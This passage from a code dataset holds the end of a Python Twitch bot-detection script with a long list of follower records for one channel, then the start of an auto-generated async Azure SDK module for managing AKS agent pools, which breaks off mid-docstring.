'244395838', 'from_name': 'terasuhikarir', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248393835', 'from_name': 'deujnaan', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244427885', 'from_name': 'smkgaming053', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248357784', 'from_name': 'thatchickparkergo', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248336362', 'from_name': 'msteamkksk', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492161018', 'from_name': 'Betrayportervq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244432096', 'from_name': 'auzyristv2', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492102128', 'from_name': 'Realizesnowdiw', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248387137', 'from_name': 'lutzemai0', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492138829', 'from_name': 'DistanceHeady', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244419834', 'from_name': 'teawrexg', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248397108', 'from_name': 'sly3r_jl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': 
'248335718', 'from_name': 'giusc7', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492120767', 'from_name': 'Treescm', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248290727', 'from_name': 'coccoq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485630624', 'from_name': 'birdjosephpgr', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486322061', 'from_name': 'sneeze92', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248407434', 'from_name': 'gerbrownya', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248378910', 'from_name': 'gotshadow5', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244439257', 'from_name': 'midas_666q', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492169445', 'from_name': 'friendslinda', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248291773', 'from_name': 'lvpes2f', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248342578', 'from_name': 'texcubsfo', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485613429', 'from_name': 'Playbeefsos', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492119948', 'from_name': 'jefflgl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244465629', 'from_name': 'manyrinc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244439380', 'from_name': 'beamtwitchu', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486325653', 'from_name': 'plotvrk', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248403462', 'from_name': 'b_u_l_o_c_h_k_aa', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492111083', 'from_name': 'airport827', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248379761', 'from_name': 'laquetuphj', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492132911', 'from_name': 'WomenVex', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244444954', 'from_name': 'ubisoftbrasilb', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244409009', 'from_name': 'pondernstreamj', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244397567', 'from_name': 'omar2f', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485630889', 'from_name': 'Lacebog', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248283868', 'from_name': 'vizfv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248319208', 'from_name': 'senct1', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244445224', 'from_name': 
'stereonlinexq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486324311', 'from_name': 'daughterulx', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248379675', 'from_name': 'krakantas6r', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486315268', 'from_name': 'incomexsk', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492143548', 'from_name': 'societyun', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486322770', 'from_name': 'guidelqe', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492141056', 'from_name': 'baitrjc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248360693', 'from_name': 'yourprincesskw', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486329023', 'from_name': 'reasonuJB', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248402128', 'from_name': 'gumdropstsm8', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486319932', 'from_name': 'coughcurrentGOMER', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248336394', 'from_name': 'hockamskz', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '479445682', 'from_name': 'mariaxjn', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485556564', 'from_name': 'truckss0g', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244393167', 'from_name': 'giftmyraaf', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492145328', 'from_name': 'knowledgeableApplianceswc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492130364', 'from_name': 'meadow790', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248355491', 'from_name': 'shp_tvdk', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244399846', 'from_name': 'seals311g', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486324576', 'from_name': 'quietRuthless', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485521672', 'from_name': 'Denysleetrar', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485630110', 'from_name': 'cushion201', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485516406', 'from_name': 'Ronaldxfy', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244487549', 'from_name': 'thefuncannon7', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248294219', 'from_name': 'fooyam', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248402484', 'from_name': 'madqfrogh', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485613809', 'from_name': 
'cattlewOK', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485610899', 'from_name': 'Watch0lx', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486326677', 'from_name': 'sense0cc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492106738', 'from_name': 'jellyfishwfz', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248378837', 'from_name': 'taylorreneea', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485520287', 'from_name': 'waterfallDarkooj', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492160281', 'from_name': 'middletjz', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244415239', 'from_name': 'customstoriesp', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492104393', 'from_name': 'busysidewalkvll', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248281727', 'from_name': 'trihexdn', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248365147', 'from_name': 'dota2ti_ru_33', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244438241', 'from_name': 'brolynhofgcda', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248335646', 'from_name': 'dreads3b', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486322790', 'from_name': 'ronaldWildflower', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492155161', 'from_name': 'BirdsNaN', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248336342', 'from_name': 'guillermordzwa', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248410146', 'from_name': 'thebubbaarmy2', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248300233', 'from_name': 'puppersm', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244497630', 'from_name': 'anthonycaliber7', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492155055', 'from_name': 'fork589', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248393987', 'from_name': 'loke921', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248357761', 'from_name': '24kbrownmagics', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248361340', 'from_name': 'taymool', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248361300', 'from_name': 'worrun_tv8', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248393897', 'from_name': 'mrmacavityu', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244392136', 'from_name': 'taerssi', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248349316', 
'from_name': 'dota2ti_ru_3od', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492167799', 'from_name': 'Statement38', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248338213', 'from_name': 'ilovemundays0', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244388512', 'from_name': 'cyrustwob', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485578588', 'from_name': 'creature891', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486328855', 'from_name': 'turndog', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248378133', 'from_name': 'diovanakoniw', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485579923', 'from_name': 'noisehf', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244439565', 'from_name': 'kutcherlolmw', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248362319', 'from_name': 'zombsowu', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244470398', 'from_name': 'hotformw', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248347689', 'from_name': 'gale_adeladey', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248354795', 'from_name': 'd3th_c', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248361424', 'from_name': 'z4mmpam', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248358913', 'from_name': 'alinefoxp', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485627670', 'from_name': 'surprisequickest', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '248308308', 'from_name': 'otzdarvaml', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '244482858', 'from_name': 'napostelw2', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '485630893', 'from_name': 'basecrt', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '485524263', 'from_name': 'Firejhv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '486316712', 'from_name': 'Furniturexvd', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '492148973', 'from_name': 'achiever824', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '244405299', 'from_name': 'mayanastreamy', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '492161324', 'from_name': 'watchOptimize', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '486323148', 'from_name': 'Humiliatechickenswgw', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '485522674', 'from_name': 'butterflyomo', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '248397942', 
'from_name': 'myfreshgamesz', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '248403312', 'from_name': 'h0lydivaqf', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '244405681', 'from_name': 'gunnermaniacc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '248385299', 'from_name': 'billyiiiaxteps', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '248397320', 'from_name': 'bourakkkkh', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '479449860', 'from_name': 'yokenn0', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '244445037', 'from_name': 'casinorockstarc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '244465315', 'from_name': 'diehahnl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '244412172', 'from_name': 'bricegamingzoneim', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '485575178', 'from_name': 'bellshjv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '492135858', 'from_name': 'Jewel693', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '492125073', 'from_name': 'Sistersskk', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '248408202', 'from_name': 'fettmastaxq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '248385799', 'from_name': 'daspdcdv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '244465426', 'from_name': 'jokeronestvq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}]
sanitized_foll_uids = bot_det.sanitize_foll_list(sample_foll_list)
print(f'Length of sanitized list: {len(sanitized_foll_uids)}')
print(f'Sanitized uids:\n {sanitized_foll_uids}')
if __name__ == "__main__":
main()
| 356.55814 | 41,059 | 0.657949 |
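The script in the row above passes its raw Twitch follow records to bot_det.sanitize_foll_list without showing that function's body. The sketch below is a plausible, minimal implementation, assuming the sanitizer simply reduces the records to a de-duplicated, order-preserving list of follower user IDs; the behaviour and the sample data are assumptions for illustration, not the actual bot_det code.

from typing import Dict, List

def sanitize_foll_list(foll_list: List[Dict[str, str]]) -> List[str]:
    """Reduce raw follow records to unique follower user IDs (assumed behaviour)."""
    seen = set()
    uids = []
    for record in foll_list:
        uid = record.get('from_id')
        if uid and uid not in seen:  # skip malformed records and duplicates
            seen.add(uid)
            uids.append(uid)         # keep the original ordering
    return uids

if __name__ == "__main__":
    # Two records with the same from_id collapse to a single uid.
    sample = [
        {'from_id': '485518673', 'from_name': 'statementzzW', 'to_id': '106071345',
         'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'},
        {'from_id': '485518673', 'from_name': 'statementzzW', 'to_id': '106071345',
         'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'},
    ]
    print(sanitize_foll_list(sample))  # -> ['485518673']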
2b0efca8fd68b4a70eeabb2396ae827a6467d6dc | 30,148 | py | Python | src/aks-preview/azext_aks_preview/vendored_sdks/azure_mgmt_preview_aks/v2022_01_02_preview/aio/operations/_agent_pools_operations.py | zjpjack/azure-cli-extensions | 17dd637317633ea7984e168900bdf4e62c265096 | [
"MIT"
] | 1 | 2022-03-09T08:59:13.000Z | 2022-03-09T08:59:13.000Z | src/aks-preview/azext_aks_preview/vendored_sdks/azure_mgmt_preview_aks/v2022_01_02_preview/aio/operations/_agent_pools_operations.py | zjpjack/azure-cli-extensions | 17dd637317633ea7984e168900bdf4e62c265096 | [
"MIT"
] | null | null | null | src/aks-preview/azext_aks_preview/vendored_sdks/azure_mgmt_preview_aks/v2022_01_02_preview/aio/operations/_agent_pools_operations.py | zjpjack/azure-cli-extensions | 17dd637317633ea7984e168900bdf4e62c265096 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._agent_pools_operations import build_create_or_update_request_initial, build_delete_request_initial, build_get_available_agent_pool_versions_request, build_get_request, build_get_upgrade_profile_request, build_list_request, build_upgrade_node_image_version_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class AgentPoolsOperations:
"""AgentPoolsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.containerservice.v2022_01_02_preview.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> AsyncIterable["_models.AgentPoolListResult"]:
"""Gets a list of agent pools in the specified managed cluster.
Gets a list of agent pools in the specified managed cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AgentPoolListResult or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerservice.v2022_01_02_preview.models.AgentPoolListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPoolListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("AgentPoolListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> "_models.AgentPool":
"""Gets the specified managed cluster agent pool.
Gets the specified managed cluster agent pool.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPool, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2022_01_02_preview.models.AgentPool
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPool"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: "_models.AgentPool",
**kwargs: Any
) -> "_models.AgentPool":
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPool"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'AgentPool')
request = build_create_or_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AgentPool', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: "_models.AgentPool",
**kwargs: Any
) -> AsyncLROPoller["_models.AgentPool"]:
"""Creates or updates an agent pool in the specified managed cluster.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:param parameters: The agent pool to create or update.
:type parameters: ~azure.mgmt.containerservice.v2022_01_02_preview.models.AgentPool
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2022_01_02_preview.models.AgentPool]
:raises: ~azure.core.exceptions.HttpResponseError
"""
